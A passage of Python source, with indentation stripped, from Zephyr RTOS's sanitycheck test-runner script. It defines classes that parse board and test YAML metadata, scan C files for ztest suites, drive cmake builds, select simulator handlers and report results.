try:
d[k] = self._cast_value(d[k], kinfo["type"])
except ValueError:
raise ConfigurationError(
self.filename, "bad %s value '%s' for key '%s' in name '%s'" %
(kinfo["type"], d[k], k, name))
return d
class Platform:
"""Class representing metadata for a particular platform
Maps directly to BOARD when building"""
platform_schema = scl.yaml_load(os.path.join(ZEPHYR_BASE,
"scripts", "sanity_chk", "platform-schema.yaml"))
def __init__(self):
"""Constructor.
"""
self.name = ""
self.sanitycheck = True
# if no RAM size is specified by the board, take a default of 128K
self.ram = 128
self.ignore_tags = []
self.only_tags = []
self.default = False
# if no flash size is specified by the board, take a default of 512K
self.flash = 512
self.supported = set()
self.arch = ""
self.type = "na"
self.simulation = "na"
self.supported_toolchains = []
self.env = []
self.env_satisfied = True
self.filter_data = dict()
def load(self, platform_file):
scp = SanityConfigParser(platform_file, self.platform_schema)
scp.load()
data = scp.data
self.name = data['identifier']
self.sanitycheck = data.get("sanitycheck", True)
# if no RAM size is specified by the board, take a default of 128K
self.ram = data.get("ram", 128)
testing = data.get("testing", {})
self.ignore_tags = testing.get("ignore_tags", [])
self.only_tags = testing.get("only_tags", [])
self.default = testing.get("default", False)
# if no flash size is specified by the board, take a default of 512K
self.flash = data.get("flash", 512)
self.supported = set()
for supp_feature in data.get("supported", []):
for item in supp_feature.split(":"):
self.supported.add(item)
self.arch = data['arch']
self.type = data.get('type', "na")
self.simulation = data.get('simulation', "na")
self.supported_toolchains = data.get("toolchain", [])
self.env = data.get("env", [])
self.env_satisfied = True
for env in self.env:
if not os.environ.get(env, None):
self.env_satisfied = False
def __repr__(self):
return "<%s on %s>" % (self.name, self.arch)
class DisablePyTestCollectionMixin(object):
__test__ = False
class TestCase(DisablePyTestCollectionMixin):
"""Class representing a test application
"""
def __init__(self, testcase_root, workdir, name):
"""TestCase constructor.
This gets called by TestSuite as it finds and reads test yaml files.
Multiple TestCase instances may be generated from a single testcase.yaml,
each one corresponds to an entry within that file.
We need to have a unique name for every single test case. Since
a testcase.yaml can define multiple tests, the canonical name for
the test case is <workdir>/<name>.
@param testcase_root os.path.abspath() of one of the --testcase-root
@param workdir Sub-directory of testcase_root where the
.yaml test configuration file was found
@param name Name of this test case, corresponding to the entry name
in the test case configuration file. For many test cases that just
define one test, can be anything and is usually "test". This is
really only used to distinguish between different cases when
the testcase.yaml defines multiple tests
"""
self.source_dir = ""
self.yamlfile = ""
self.cases = []
self.name = self.get_unique(testcase_root, workdir, name)
self.id = name
self.type = None
self.tags = set()
self.extra_args = None
self.extra_configs = None
self.arch_allow = None
self.arch_exclude = None
self.skip = False
self.platform_exclude = None
self.platform_allow = None
self.toolchain_exclude = None
self.toolchain_allow = None
self.tc_filter = None
self.timeout = 60
self.harness = ""
self.harness_config = {}
self.build_only = True
self.build_on_all = False
self.slow = False
self.min_ram = -1
self.depends_on = None
self.min_flash = -1
self.extra_sections = None
self.integration_platforms = []
@staticmethod
def get_unique(testcase_root, workdir, name):
canonical_testcase_root = os.path.realpath(testcase_root)
if Path(canonical_zephyr_base) in Path(canonical_testcase_root).parents:
# This is in ZEPHYR_BASE, so include path in name for uniqueness
# FIXME: We should not depend on path of test for unique names.
relative_tc_root = os.path.relpath(canonical_testcase_root,
start=canonical_zephyr_base)
else:
relative_tc_root = ""
# workdir can be "."
unique = os.path.normpath(os.path.join(relative_tc_root, workdir, name))
check = name.split(".")
if len(check) < 2:
raise SanityCheckException(f"""bad test name '{name}' in {testcase_root}/{workdir}. \
Tests should reference the category and subsystem with a dot as a separator.
"""
)
return unique
@staticmethod
def scan_file(inf_name):
suite_regex = re.compile(
# do not match until end-of-line, otherwise we won't allow
# stc_regex below to catch the ones that are declared in the same
# line--as we only search starting the end of this match
br"^\s*ztest_test_suite\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,",
re.MULTILINE)
stc_regex = re.compile(
br"^\s*" # empy space at the beginning is ok
# catch the case where it is declared in the same sentence, e.g:
#
# ztest_test_suite(mutex_complex, ztest_user_unit_test(TESTNAME));
br"(?:ztest_test_suite\([a-zA-Z0-9_]+,\s*)?"
# Catch ztest[_user]_unit_test-[_setup_teardown](TESTNAME)
br"ztest_(?:1cpu_)?(?:user_)?unit_test(?:_setup_teardown)?"
# Consume the argument that becomes the extra testcse
br"\(\s*"
br"(?P<stc_name>[a-zA-Z0-9_]+)"
# _setup_teardown() variant has two extra arguments that we ignore
br"(?:\s*,\s*[a-zA-Z0-9_]+\s*,\s*[a-zA-Z0-9_]+)?"
br"\s*\)",
# We don't check how it finishes; we don't care
re.MULTILINE)
suite_run_regex = re.compile(
br"^\s*ztest_run_test_suite\((?P<suite_name>[a-zA-Z0-9_]+)\)",
re.MULTILINE)
achtung_regex = re.compile(
br"(#ifdef|#endif)",
re.MULTILINE)
warnings = None
with open(inf_name) as inf:
if os.name == 'nt':
mmap_args = {'fileno': inf.fileno(), 'length': 0, 'access': mmap.ACCESS_READ}
else:
mmap_args = {'fileno': inf.fileno(), 'length': 0, 'flags': mmap.MAP_PRIVATE, 'prot': mmap.PROT_READ,
'offset': 0}
with contextlib.closing(mmap.mmap(**mmap_args)) as main_c:
suite_regex_match = suite_regex.search(main_c)
if not suite_regex_match:
# can't find ztest_test_suite, maybe a client, because
# it includes ztest.h
return None, None
suite_run_match = suite_run_regex.search(main_c)
if not suite_run_match:
raise ValueError("can't find ztest_run_test_suite")
achtung_matches = re.findall(
achtung_regex,
main_c[suite_regex_match.end():suite_run_match.start()])
if achtung_matches:
warnings = "found invalid %s in ztest_test_suite()" \
% ", ".join(sorted({match.decode() for match in achtung_matches},reverse = True))
_matches = re.findall(
stc_regex,
main_c[suite_regex_match.end():suite_run_match.start()])
for match in _matches:
if not match.decode().startswith("test_"):
warnings = "Found a test that does not start with test_"
matches = [match.decode().replace("test_", "", 1) for match in _matches]
return matches, warnings
def scan_path(self, path):
subcases = []
for filename in glob.glob(os.path.join(path, "src", "*.c*")):
try:
_subcases, warnings = self.scan_file(filename)
if warnings:
logger.error("%s: %s" % (filename, warnings))
raise SanityRuntimeError("%s: %s" % (filename, warnings))
if _subcases:
subcases += _subcases
except ValueError as e:
logger.error("%s: can't find: %s" % (filename, e))
for filename in glob.glob(os.path.join(path, "*.c")):
try:
_subcases, warnings = self.scan_file(filename)
if warnings:
logger.error("%s: %s" % (filename, warnings))
if _subcases:
subcases += _subcases
except ValueError as e:
logger.error("%s: can't find: %s" % (filename, e))
return subcases
def parse_subcases(self, test_path):
results = self.scan_path(test_path)
for sub in results:
name = "{}.{}".format(self.id, sub)
self.cases.append(name)
if not results:
self.cases.append(self.id)
def __str__(self):
return self.name
class TestInstance(DisablePyTestCollectionMixin):
"""Class representing the execution of a particular TestCase on a platform
@param test The TestCase object we want to build/execute
@param platform Platform object that we want to build and run against
@param base_outdir Base directory for all test results. The actual
out directory used is <outdir>/<platform>/<test case name>
"""
def __init__(self, testcase, platform, outdir):
self.testcase = testcase
self.platform = platform
self.status = None
self.reason = "Unknown"
self.metrics = dict()
self.handler = None
self.outdir = outdir
self.name = os.path.join(platform.name, testcase.name)
self.build_dir = os.path.join(outdir, platform.name, testcase.name)
self.run = False
self.results = {}
def __lt__(self, other):
return self.name < other.name
@staticmethod
def testcase_runnable(testcase, fixtures):
can_run = False
# console harness allows us to run the test and capture data.
if testcase.harness in [ 'console', 'ztest']:
can_run = True
# if we have a fixture that is also being supplied on the
# command-line, then we need to run the test, not just build it.
fixture = testcase.harness_config.get('fixture')
if fixture:
can_run = (fixture in fixtures)
elif testcase.harness:
can_run = False
else:
can_run = True
return can_run
# Global testsuite parameters
def check_runnable(self, enable_slow=False, filter='buildable', fixtures=[]):
# right now we only support building on windows. running is still work
# in progress.
if os.name == 'nt':
return False
# we asked for build-only on the command line
if self.testcase.build_only:
return False
# Do not run slow tests:
skip_slow = self.testcase.slow and not enable_slow
if skip_slow:
return False
target_ready = bool(self.testcase.type == "unit" or \
self.platform.type == "native" or \
self.platform.simulation in ["mdb-nsim", "nsim", "renode", "qemu", "tsim"] or \
filter == 'runnable')
if self.platform.simulation == "nsim":
if not find_executable("nsimdrv"):
target_ready = False
if self.platform.simulation == "mdb-nsim":
if not find_executable("mdb"):
target_ready = False
if self.platform.simulation == "renode":
if not find_executable("renode"):
target_ready = False
if self.platform.simulation == "tsim":
if not find_executable("tsim-leon3"):
target_ready = False
testcase_runnable = self.testcase_runnable(self.testcase, fixtures)
return testcase_runnable and target_ready
def create_overlay(self, platform, enable_asan=False, enable_ubsan=False, enable_coverage=False, coverage_platform=[]):
# Create this in a "sanitycheck/" subdirectory otherwise this
# will pass this overlay to kconfig.py *twice* and kconfig.cmake
# will silently give that second time precedence over any
# --extra-args=CONFIG_*
subdir = os.path.join(self.build_dir, "sanitycheck")
content = ""
if self.testcase.extra_configs:
content = "\n".join(self.testcase.extra_configs)
if enable_coverage:
if platform.name in coverage_platform:
content = content + "\nCONFIG_COVERAGE=y"
content = content + "\nCONFIG_COVERAGE_DUMP=y"
if enable_asan:
if platform.type == "native":
content = content + "\nCONFIG_ASAN=y"
if enable_ubsan:
if platform.type == "native":
content = content + "\nCONFIG_UBSAN=y"
if content:
os.makedirs(subdir, exist_ok=True)
file = os.path.join(subdir, "testcase_extra.conf")
with open(file, "w") as f:
f.write(content)
return content
def calculate_sizes(self):
"""Get the RAM/ROM sizes of a test case.
This can only be run after the instance has been executed by
MakeGenerator, otherwise there won't be any binaries to measure.
@return A SizeCalculator object
"""
fns = glob.glob(os.path.join(self.build_dir, "zephyr", "*.elf"))
fns.extend(glob.glob(os.path.join(self.build_dir, "zephyr", "*.exe")))
fns = [x for x in fns if not x.endswith('_prebuilt.elf')]
if len(fns) != 1:
raise BuildError("Missing/multiple output ELF binary")
return SizeCalculator(fns[0], self.testcase.extra_sections)
def fill_results_by_status(self):
"""Fills results according to self.status
The method is used to propagate the instance level status
to the test cases inside. Useful when the whole instance is skipped
and the info is required also at the test cases level for reporting.
Should be used with caution, e.g. should not be used
to fill all results with passes
"""
status_to_verdict = {
'skipped': 'SKIP',
'error': 'BLOCK',
'failure': 'FAILED'
}
for k in self.results:
self.results[k] = status_to_verdict[self.status]
def __repr__(self):
return "<TestCase %s on %s>" % (self.testcase.name, self.platform.name)
class CMake():
config_re = re.compile('(CONFIG_[A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
dt_re = re.compile('([A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
def __init__(self, testcase, platform, source_dir, build_dir):
self.cwd = None
self.capture_output = True
self.defconfig = {}
self.cmake_cache = {}
self.instance = None
self.testcase = testcase
self.platform = platform
self.source_dir = source_dir
self.build_dir = build_dir
self.log = "build.log"
self.generator = None
self.generator_cmd = None
def parse_generated(self):
self.defconfig = {}
return {}
def run_build(self, args=[]):
logger.debug("Building %s for %s" % (self.source_dir, self.platform.name))
cmake_args = []
cmake_args.extend(args)
cmake = shutil.which('cmake')
cmd = [cmake] + cmake_args
kwargs = dict()
if self.capture_output:
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
if self.cwd:
kwargs['cwd'] = self.cwd
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
results = {}
if p.returncode == 0:
msg = "Finished building %s for %s" % (self.source_dir, self.platform.name)
self.instance.status = "passed"
results = {'msg': msg, "returncode": p.returncode, "instance": self.instance}
if out:
log_msg = out.decode(sys.getdefaultencoding())
with open(os.path.join(self.build_dir, self.log), "a") as log:
log.write(log_msg)
else:
return None
else:
# A real error occurred, raise an exception
log_msg = ""
if out:
log_msg = out.decode(sys.getdefaultencoding())
with open(os.path.join(self.build_dir, self.log), "a") as log:
log.write(log_msg)
if log_msg:
res = re.findall("region `(FLASH|RAM|SRAM)' overflowed by", log_msg)
if res:
logger.debug("Test skipped due to {} Overflow".format(res[0]))
self.instance.status = "skipped"
self.instance.reason = "{} overflow".format(res[0])
self.suite.build_filtered_tests += 1
else:
self.instance.status = "error"
self.instance.reason = "Build failure"
results = {
"returncode": p.returncode,
"instance": self.instance,
}
return results
def run_cmake(self, args=[]):
if self.warnings_as_errors:
ldflags = "-Wl,--fatal-warnings"
cflags = "-Werror"
aflags = "-Wa,--fatal-warnings"
else:
ldflags = cflags = aflags = ""
logger.debug("Running cmake on %s for %s" % (self.source_dir, self.platform.name))
cmake_args = [
f'-B{self.build_dir}',
f'-S{self.source_dir}',
f'-DEXTRA_CFLAGS="{cflags}"',
f'-DEXTRA_AFLAGS="{aflags}',
f'-DEXTRA_LDFLAGS="{ldflags}"',
f'-G{self.generator}'
]
if self.cmake_only:
cmake_args.append("-DCMAKE_EXPORT_COMPILE_COMMANDS=1")
args = ["-D{}".format(a.replace('"', '')) for a in args]
cmake_args.extend(args)
cmake_opts = ['-DBOARD={}'.format(self.platform.name)]
cmake_args.extend(cmake_opts)
logger.debug("Calling cmake with arguments: {}".format(cmake_args))
cmake = shutil.which('cmake')
cmd = [cmake] + cmake_args
kwargs = dict()
if self.capture_output:
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
if self.cwd:
kwargs['cwd'] = self.cwd
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
if p.returncode == 0:
filter_results = self.parse_generated()
msg = "Finished building %s for %s" % (self.source_dir, self.platform.name)
logger.debug(msg)
results = {'msg': msg, 'filter': filter_results}
else:
self.instance.status = "error"
self.instance.reason = "Cmake build failure"
logger.error("Cmake build failure: %s for %s" % (self.source_dir, self.platform.name))
results = {"returncode": p.returncode}
if out:
with open(os.path.join(self.build_dir, self.log), "a") as log:
log_msg = out.decode(sys.getdefaultencoding())
log.write(log_msg)
return results
class FilterBuilder(CMake):
def __init__(self, testcase, platform, source_dir, build_dir):
super().__init__(testcase, platform, source_dir, build_dir)
self.log = "config-sanitycheck.log"
def parse_generated(self):
if self.platform.name == "unit_testing":
return {}
cmake_cache_path = os.path.join(self.build_dir, "CMakeCache.txt")
defconfig_path = os.path.join(self.build_dir, "zephyr", ".config")
with open(defconfig_path, "r") as fp:
defconfig = {}
for line in fp.readlines():
m = self.config_re.match(line)
if not m:
if line.strip() and not line.startswith("#"):
sys.stderr.write("Unrecognized line %s\n" % line)
continue
defconfig[m.group(1)] = m.group(2).strip()
self.defconfig = defconfig
cmake_conf = {}
try:
cache = CMakeCache.from_file(cmake_cache_path)
except FileNotFoundError:
cache = {}
for k in iter(cache):
cmake_conf[k.name] = k.value
self.cmake_cache = cmake_conf
filter_data = {
"ARCH": self.platform.arch,
"PLATFORM": self.platform.name
}
filter_data.update(os.environ)
filter_data.update(self.defconfig)
filter_data.update(self.cmake_cache)
edt_pickle = os.path.join(self.build_dir, "zephyr", "edt.pickle")
if self.testcase and self.testcase.tc_filter:
try:
if os.path.exists(edt_pickle):
with open(edt_pickle, 'rb') as f:
edt = pickle.load(f)
else:
edt = None
res = expr_parser.parse(self.testcase.tc_filter, filter_data, edt)
except (ValueError, SyntaxError) as se:
sys.stderr.write(
"Failed processing %s\n" % self.testcase.yamlfile)
raise se
if not res:
return {os.path.join(self.platform.name, self.testcase.name): True}
else:
return {os.path.join(self.platform.name, self.testcase.name): False}
else:
self.platform.filter_data = filter_data
return filter_data
class ProjectBuilder(FilterBuilder):
def __init__(self, suite, instance, **kwargs):
super().__init__(instance.testcase, instance.platform, instance.testcase.source_dir, instance.build_dir)
self.log = "build.log"
self.instance = instance
self.suite = suite
self.filtered_tests = 0
self.lsan = kwargs.get('lsan', False)
self.asan = kwargs.get('asan', False)
self.ubsan = kwargs.get('ubsan', False)
self.valgrind = kwargs.get('valgrind', False)
self.extra_args = kwargs.get('extra_args', [])
self.device_testing = kwargs.get('device_testing', False)
self.cmake_only = kwargs.get('cmake_only', False)
self.cleanup = kwargs.get('cleanup', False)
self.coverage = kwargs.get('coverage', False)
self.inline_logs = kwargs.get('inline_logs', False)
self.generator = kwargs.get('generator', None)
self.generator_cmd = kwargs.get('generator_cmd', None)
self.verbose = kwargs.get('verbose', None)
self.warnings_as_errors = kwargs.get('warnings_as_errors', True)
@staticmethod
def log_info(filename, inline_logs):
filename = os.path.abspath(os.path.realpath(filename))
if inline_logs:
logger.info("{:-^100}".format(filename))
try:
with open(filename) as fp:
data = fp.read()
except Exception as e:
data = "Unable to read log data (%s)\n" % (str(e))
logger.error(data)
logger.info("{:-^100}".format(filename))
else:
logger.error("see: " + Fore.YELLOW + filename + Fore.RESET)
def log_info_file(self, inline_logs):
build_dir = self.instance.build_dir
h_log = "{}/handler.log".format(build_dir)
b_log = "{}/build.log".format(build_dir)
v_log = "{}/valgrind.log".format(build_dir)
d_log = "{}/device.log".format(build_dir)
if os.path.exists(v_log) and "Valgrind" in self.instance.reason:
self.log_info("{}".format(v_log), inline_logs)
elif os.path.exists(h_log) and os.path.getsize(h_log) > 0:
self.log_info("{}".format(h_log), inline_logs)
elif os.path.exists(d_log) and os.path.getsize(d_log) > 0:
self.log_info("{}".format(d_log), inline_logs)
else:
self.log_info("{}".format(b_log), inline_logs)
def setup_handler(self):
instance = self.instance
args = []
# FIXME: Needs simplification
if instance.platform.simulation == "qemu":
instance.handler = QEMUHandler(instance, "qemu")
args.append("QEMU_PIPE=%s" % instance.handler.get_fifo())
instance.handler.call_make_run = True
elif instance.testcase.type == "unit":
instance.handler = BinaryHandler(instance, "unit")
instance.handler.binary = os.path.join(instance.build_dir, "testbinary")
if self.coverage:
args.append("COVERAGE=1")
elif instance.platform.type == "native":
handler = BinaryHandler(instance, "native")
handler.asan = self.asan
handler.valgrind = self.valgrind
handler.lsan = self.lsan
handler.ubsan = self.ubsan
handler.coverage = self.coverage
handler.binary = os.path.join(instance.build_dir, "zephyr", "zephyr.exe")
instance.handler = handler
elif instance.platform.simulation == "renode":
if find_executable("renode"):
instance.handler = BinaryHandler(instance, "renode")
instance.handler.pid_fn = os.path.join(instance.build_dir, "renode.pid")
instance.handler.call_make_run = True
elif instance.platform.simulation == "tsim":
instance.handler = BinaryHandler(instance, "tsim")
instance.handler.call_make_run = True
elif self.device_testing:
instance.handler = DeviceHandler(instance, "device")
elif instance.platform.simulation == "nsim":
if find_executable("nsimdrv"):
instance.handler = BinaryHandler(instance, "nsim")
instance.handler.call_make_run = True
elif instance.platform.simulation == "mdb-nsim":
if find_executable("mdb"):
instance.handler = BinaryHandler(instance, "nsim")
instance.handler.pid_fn = os.path.join(instance.build_dir, "mdb.pid")
instance.handler.call_west_flash = True
if instance.handler:
instance.handler.args = args
instance.handler.generator_cmd = self.generator_cmd
instance.handler.generator = self.generator
def process(self, message):
op = message.get('op')
if not self.instance.handler:
self.setup_handler()
# The build process, call cmake and build with configured generator
if op == "cmake":
results = self.cmake()
if self.instance.status in ["failed", "error"]:
pipeline.put({"op": "report", "test": self.instance})
elif self.cmake_only:
if self.instance.status is None:
self.instance.status = "passed"
pipeline.put({"op": "report", "test": self.instance})
else:
if self.instance.name in results['filter'] and results['filter'][self.instance.name]:
logger.debug("filtering %s" % self.instance.name)
self.instance.status = "skipped"
self.instance.reason = "filter"
self.suite.build_filtered_tests += 1
for case in self.instance.testcase.cases:
self.instance.results.update({case: 'SKIP'})
pipeline.put({"op": "report", "test": self.instance})
else:
pipeline.put({"op": "build", "test": self.instance})
elif op == "build":
logger.debug("build test: %s" % self.instance.name)
results = self.build()
if not results:
self.instance.status = "error"
self.instance.reason = "Build Failure"
pipeline.put({"op": "report", "test": self.instance})
else:
if results.get('returncode', 1) > 0:
pipeline.put({"op": "report", "test": self.instance})
else:
if self.instance.run and self.instance.handler:
pipeline.put({"op": "run", "test": self.instance})
else:
pipeline.put({"op": "report", "test": self.instance})
# Run the generated binary using one of the supported handlers
elif op == "run":
logger.debug("run test: %s" % self.instance.name)
self.run()
self.instance.status, _ = self.instance.handler.get_state()
logger.debug(f"run status: {self.instance.status}")
pipeline.put({
"op": "report",
"test": self.instance,
"state": "executed",
"status": self.instance.status,
"reason": self.instance.reason}
)
# Report results and output progress to screen
elif op == "report":
with report_lock:
self.report_out()
if self.cleanup and not self.coverage and self.instance.status == "passed":
pipeline.put({
"op": "cleanup",
"test": self.instance
})
elif op == "cleanup":
if self.device_testing:
self.cleanup_device_testing_artifacts()
else:
self.cleanup_artifacts()
def cleanup_artifacts(self, additional_keep=[]):
logger.debug("Cleaning up {}".format(self.instance.build_dir))
allow = [
'zephyr/.config',
'handler.log',
'build.log',
'device.log',
'recording.csv',
]
allow += additional_keep
allow = [os.path.join(self.instance.build_dir, file) for file in allow]
for dirpath, dirnames, filenames in os.walk(self.instance.build_dir, topdown=False):
for name in filenames:
path = os.path.join(dirpath, name)
if path not in allow:
os.remove(path)
# Remove empty directories and symbolic links to directories
for dir in dirnames:
path = os.path.join(dirpath, dir)
if os.path.islink(path):
os.remove(path)
elif not os.listdir(path):
os.rmdir(path)
def cleanup_device_testing_artifacts(self):
logger.debug("Cleaning up for Device Testing {}".format(self.instance.build_dir))
sanitizelist = [
'CMakeCache.txt',
'zephyr/runners.yaml',
]
keep = [
'zephyr/zephyr.hex',
'zephyr/zephyr.bin',
'zephyr/zephyr.elf',
]
keep += sanitizelist
self.cleanup_artifacts(keep)
# sanitize paths so files are relocatable
for file in sanitizelist:
file = os.path.join(self.instance.build_dir, file)
with open(file, "rt") as fin:
data = fin.read()
data = data.replace(canonical_zephyr_base+"/", "")
with open(file, "wt") as fin:
fin.write(data)
def report_out(self):
total_tests_width = len(str(self.suite.total_to_do))
self.suite.total_done += 1
instance = self.instance
if instance.status in ["error", "failed", "timeout"]:
if instance.status == "error":
self.suite.total_errors += 1
self.suite.total_failed += 1
if self.verbose:
status = Fore.RED + "FAILED " + Fore.RESET + instance.reason
else:
print("")
logger.error(
"{:<25} {:<50} {}FAILED{}: {}".format(
instance.platform.name,
instance.testcase.name,
Fore.RED,
Fore.RESET,
instance.reason))
if not self.verbose:
self.log_info_file(self.inline_logs)
elif instance.status == "skipped":
status = Fore.YELLOW + "SKIPPED" + Fore.RESET
elif instance.status == "passed":
status = Fore.GREEN + "PASSED" + Fore.RESET
else:
logger.debug(f"Unknown status = {instance.status}")
status = Fore.YELLOW + "UNKNOWN" + Fore.RESET
if self.verbose:
if self.cmake_only:
more_info = "cmake"
elif instance.status == "skipped":
more_info = instance.reason
else:
if instance.handler and instance.run:
more_info = instance.handler.type_str
htime = instance.handler.duration
if htime:
more_info += " {:.3f}s".format(htime)
else:
more_info = "build"
logger.info("{:>{}}/{} {:<25} {:<50} {} ({})".format(
self.suite.total_done, total_tests_width, self.suite.total_to_do, instance.platform.name,
instance.testcase.name, status, more_info))
if instance.status in ["error", "failed", "timeout"]:
self.log_info_file(self.inline_logs)
else:
completed_perc = 0
if self.suite.total_to_do > 0:
completed_perc = int((float(self.suite.total_done) / self.suite.total_to_do) * 100)
sys.stdout.write("\rINFO - Total complete: %s%4d/%4d%s %2d%% skipped: %s%4d%s, failed: %s%4d%s" % (
Fore.GREEN,
self.suite.total_done,
self.suite.total_to_do,
Fore.RESET,
completed_perc,
Fore.YELLOW if self.suite.build_filtered_tests > 0 else Fore.RESET,
self.suite.build_filtered_tests,
Fore.RESET,
Fore.RED if self.suite.total_failed > 0 else Fore.RESET,
self.suite.total_failed,
Fore.RESET
)
)
sys.stdout.flush()
def cmake(self):
instance = self.instance
args = self.testcase.extra_args[:]
args += self.extra_args
if instance.handler:
args += instance.handler.args
# merge overlay files into one variable
def extract_overlays(args):
re_overlay = re.compile('OVERLAY_CONFIG=(.*)')
other_args = []
overlays = []
for arg in args:
match = re_overlay.search(arg)
if match:
overlays.append(match.group(1).strip('\'"'))
else:
other_args.append(arg)
args[:] = other_args
return overlays
overlays = extract_overlays(args)
if (self.testcase.extra_configs or self.coverage or
self.asan or self.ubsan):
overlays.append(os.path.join(instance.build_dir,
"sanitycheck", "testcase_extra.conf"))
if overlays:
args.append("OVERLAY_CONFIG=\"%s\"" % (" ".join(overlays)))
results = self.run_cmake(args)
return results
def build(self):
results = self.run_build(['--build', self.build_dir])
return results
def run(self):
instance = self.instance
if instance.handler:
if instance.handler.type_str == "device":
instance.handler.suite = self.suite
instance.handler.handle()
sys.stdout.flush()
class BoundedExecutor(concurrent.futures.ThreadPoolExecutor):
"""BoundedExecutor behaves as a ThreadPoolExecutor which will block on
calls to submit() once the limit given as "bound" work items are queued for
execution.
:param bound: Integer - the maximum number of items in the work queue
:param max_workers: Integer - the size of the thread pool
"""
def __init__(self, bound, max_workers, **kwargs):
super().__init__(max_workers)
# self.executor = ThreadPoolExecutor(max_workers=max_workers)
self.semaphore = BoundedSemaphore(bound + max_workers)
def submit(self, fn, *args, **kwargs):
self.semaphore.acquire()
try:
future = super().submit(fn, *args, **kwargs)
except Exception:
self.semaphore.release()
raise
else:
future.add_done_callback(lambda x: self.semaphore.release())
return future
class TestSuite(DisablePyTestCollectionMixin):
config_re = re.compile('(CONFIG_[A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
dt_re = re.compile('([A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
tc_schema = scl.yaml_load(
os.path.join(ZEPHYR_BASE,
"scripts", "sanity_chk", "testcase-schema.yaml"))
testcase_valid_keys = {"tags": {"type": "set", "required": False},
"type": {"type": "str", "default": "integration"},
"extra_args": {"type": "list"},
"extra_configs": {"type": "list"},
"build_only": {"type": "bool", "default": False},
"build_on_all": {"type": "bool", "default": False},
"skip": {"type": "bool", "default": False},
"slow": {"type": "bool", "default": False},
"timeout": {"type": "int", "default": 60},
"min_ram": {"type": "int", "default": 8},
"depends_on": {"type": "set"},
"min_flash": {"type": "int", "default": 32},
"arch_allow": {"type": "set"},
"arch_exclude": {"type": "set"},
"extra_sections": {"type": "list", "default": []},
"integration_platforms": {"type": "list", "default": []},
"platform_exclude": {"type": "set"},
"platform_allow": {"type": "set"},
"toolchain_exclude": {"type": "set"},
"toolchain_allow": {"type": "set"},
"filter": {"type": "str"},
"harness": {"type": "str"},
"harness_config": {"type": "map", "default": {}}
}
RELEASE_DATA = os.path.join(ZEPHYR_BASE, "scripts", "sanity_chk",
"sanity_last_release.csv")
SAMPLE_FILENAME = 'sample.yaml'
TESTCASE_FILENAME = 'testcase.yaml'
def __init__(self, board_root_list=[], testcase_roots=[], outdir=None):
self.roots = testcase_roots
if not isinstance(board_root_list, list):
self.board_roots = [board_root_list]
else:
self.board_roots = board_root_list
# Testsuite Options
self.coverage_platform = []
self.build_only = False
self.cmake_only = False
self.cleanup = False
self.enable_slow = False
self.device_testing = False
self.fixtures = []
self.enable_coverage = False
self.enable_ubsan = False
self.enable_lsan = False
self.enable_asan = False
self.enable_valgrind = False
self.extra_args = []
self.inline_logs = False
self.enable_sizes_report = False
self.west_flash = None
self.west_runner = None
self.generator = None
self.generator_cmd = None
self.warnings_as_errors = True
# Keep track of which test cases we've filtered out and why
self.testcases = {}
self.platforms = []
self.selected_platforms = []
self.default_platforms = []
self.outdir = os.path.abspath(outdir)
self.discards = {}
self.load_errors = 0
self.instances = dict()
self.total_tests = 0 # number of test instances
self.total_cases = 0 # number of test cases
self.total_skipped_cases = 0 # number of skipped test cases
self.total_to_do = 0 # number of test instances to be run
self.total_done = 0 # tests completed
self.total_failed = 0
self.total_skipped = 0
self.build_filtered_tests = 0
self.total_passed = 0
self.total_errors = 0
self.total_platforms = 0
self.start_time = 0
self.duration = 0
self.warnings = 0
self.cv = threading.Condition()
# hardcoded for now
self.connected_hardware = []
# run integration tests only
self.integration = False
self.version = "NA"
def check_zephyr_version(self):
try:
subproc = subprocess.run(["git", "describe"],
stdout=subprocess.PIPE,
universal_newlines=True,
cwd=ZEPHYR_BASE)
if subproc.returncode == 0:
self.version = subproc.stdout.strip()
logger.info(f"Zephyr version: {self.version}")
except OSError:
logger.info("Cannot read zephyr version.")
def get_platform_instances(self, platform):
filtered_dict = {k:v for k,v in self.instances.items() if k.startswith(platform + "/")}
return filtered_dict
def config(self):
logger.info("coverage platform: {}".format(self.coverage_platform))
# Debug Functions
@staticmethod
def info(what):
sys.stdout.write(what + "\n")
sys.stdout.flush()
def update_counting(self):
self.total_tests = len(self.instances)
self.total_cases = 0
self.total_skipped = 0
self.total_skipped_cases = 0
self.total_passed = 0
for instance in self.instances.values():
self.total_cases += len(instance.testcase.cases)
if instance.status == 'skipped':
self.total_skipped += 1
self.total_skipped_cases += len(instance.testcase.cases)
elif instance.status == "passed":
self.total_passed += 1
for res in instance.results.values():
if res == 'SKIP':
self.total_skipped_cases += 1
self.total_to_do = self.total_tests - self.total_skipped
def compare_metrics(self, filename):
# name, datatype, lower results better
interesting_metrics = [("ram_size", int, True),
("rom_size", int, True)]
if not os.path.exists(filename):
logger.error("Cannot compare metrics, %s not found" % filename)
return []
results = []
saved_metrics = {}
with open(filename) as fp:
cr = csv.DictReader(fp)
for row in cr:
d = {}
for m, _, _ in interesting_metrics:
d[m] = row[m]
saved_metrics[(row["test"], row["platform"])] = d
for instance in self.instances.values():
mkey = (instance.testcase.name, instance.platform.name)
if mkey not in saved_metrics:
continue
sm = saved_metrics[mkey]
for metric, mtype, lower_better in interesting_metrics:
if metric not in instance.metrics:
continue
if sm[metric] == "":
continue
delta = instance.metrics.get(metric, 0) - mtype(sm[metric])
if delta == 0:
continue
results.append((instance, metric, instance.metrics.get(metric, 0), delta,
lower_better))
return results
def footprint_reports(self, report, show_footprint, all_deltas,
footprint_threshold, last_metrics):
if not report:
return
logger.debug("running footprint_reports")
deltas = self.compare_metrics(report)
warnings = 0
if deltas and show_footprint:
for i, metric, value, delta, lower_better in deltas:
if not all_deltas and ((delta < 0 and lower_better) or
(delta > 0 and not lower_better)):
continue
percentage = 0
if value > delta:
percentage = (float(delta) / float(value - delta))
